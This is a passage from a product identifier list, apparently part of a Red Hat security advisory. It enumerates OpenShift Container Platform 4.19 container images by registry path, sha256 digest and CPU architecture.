"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
